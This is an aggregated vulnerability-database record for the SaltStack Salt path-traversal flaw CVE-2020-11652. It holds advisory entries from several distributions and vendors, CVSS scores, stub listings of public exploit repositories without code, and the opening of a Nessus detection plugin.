An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
{"ubuntucve": [{"lastseen": "2023-01-26T14:07:49", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before\n3000.2. The salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/salt-minion/+bug/1883658>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T00:00:00", "type": "ubuntucve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "UB:CVE-2020-11652", "href": "https://ubuntu.com/security/CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. 
These methods allow arbitrary directory access to authenticated users.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SaltStack directory traversal failure to sanitize untrusted input", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-11652", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-08-18T08:19:13", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-22T07:56:32", "type": "githubexploit", "title": "Exploit for Path Traversal in 
Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-05-22T08:34:26", "id": "89061482-5DE9-5936-88EA-B1E8F0B7B0AE", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:44", "description": "# Salt Stack Profile\n\nThis profile will check to make sure your ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T03:23:01", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-08-24T12:55:25", "id": "7B851B0A-5EBA-5ACB-ABCF-C10AB9BF13FA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T00:07:27", "description": "Official patches for previous versions can be requested at: http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T20:53:49", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-03-22T21:58:18", "id": "CF83B6A1-3B69-5983-95FF-F4E961E0A478", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:20:31", "description": "# SaltStack-Exp\nCVE-2020-11651\nCVE-2020-11652\n\n#### Exec-Master:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-25T02:58:35", "type": "githubexploit", "title": "Exploit for Path Traversal in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-01-09T23:42:55", "id": "C812A443-A73F-5431-9290-0A3742561103", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-17T07:25:46", "description": "# PoC exploit for CVE-2020-11651 and CVE-2020-11652\n\nThis is a p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T11:52:28", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-02-17T06:29:10", "id": "13EBE9CB-024E-5519-A3C1-40F087AD5B30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:01:18", "description": "[1]\tWhat is it?\r\n\r\nScanning tool to test for SaltStack vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-30T09:23:23", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-11-30T09:48:22", "id": "6C55D55F-AFB4-53DF-84E1-D121636CE0D8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "debiancve": 
[{"lastseen": "2022-11-07T22:05:29", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T17:15:00", "type": "debiancve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-04-30T17:15:00", "id": "DEBIANCVE:CVE-2020-11652", "href": "https://security-tracker.debian.org/tracker/CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-05-12T01:31:29", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. 
These methods allow arbitrary directory access to authenticated users.", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T17:15:00", "type": "osv", "title": "PYSEC-2020-103", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-08-20T01:17:00", "id": "OSV:PYSEC-2020-103", "href": "https://osv.dev/vulnerability/PYSEC-2020-103", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-05T05:18:50", "description": "\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\n\n* [CVE-2020-11651](https://security-tracker.debian.org/tracker/CVE-2020-11651)\nThe salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. 
These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n* [CVE-2020-11652](https://security-tracker.debian.org/tracker/CVE-2020-11652)\nThe salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-30T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-08-05T05:18:47", "id": "OSV:DLA-2223-1", "href": "https://osv.dev/vulnerability/DLA-2223-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2022-08-10T07:15:43", "description": "\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/salt](https://security-tracker.debian.org/tracker/salt)\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-08-10T07:15:40", "id": 
"OSV:DSA-4676-2", "href": "https://osv.dev/vulnerability/DSA-4676-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:15:36", "description": "\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/salt](https://security-tracker.debian.org/tracker/salt)\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "modified": "2022-08-10T07:15:29", "id": "OSV:DSA-4676-1", "href": "https://osv.dev/vulnerability/DSA-4676-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-27T10:52:56", "description": "salt allows arbitrary directory access. The salt-master process in `ClearFuncs` class allows access to some methods that improperly sanitize paths and the methods allow authenticated users to access arbitrary directories.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-04T04:38:10", "type": "veracode", "title": "Arbitrary Directory Access", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2022-05-03T16:30:21", "id": "VERACODE:25154", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25154/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2023-02-01T08:13:45", "description": "A flaw was found in salt. 
The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-06T17:40:11", "type": "redhatcve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2023-02-01T06:11:04", "id": "RH:CVE-2020-11652", "href": "https://access.redhat.com/security/cve/cve-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-01-11T15:12:56", "description": "Several vulnerabilities were discovered in package salt, a configuration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate method calls. 
This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-01T00:00:00", "type": "nessus", "title": "Debian DLA-2223-1 : salt security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt-cloud", 
"p-cpe:/a:debian:debian_linux:salt-common", "p-cpe:/a:debian:debian_linux:salt-doc", "p-cpe:/a:debian:debian_linux:salt-master", "p-cpe:/a:debian:debian_linux:salt-minion", "p-cpe:/a:debian:debian_linux:salt-ssh", "p-cpe:/a:debian:debian_linux:salt-syndic", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2223.NASL", "href": "https://www.tenable.com/plugins/nessus/136979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2223-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136979);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Debian DLA-2223-1 : salt security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods without\nauthentication. These methods can be used to retrieve user tokens from\nthe salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods\nthat improperly sanitize paths. 
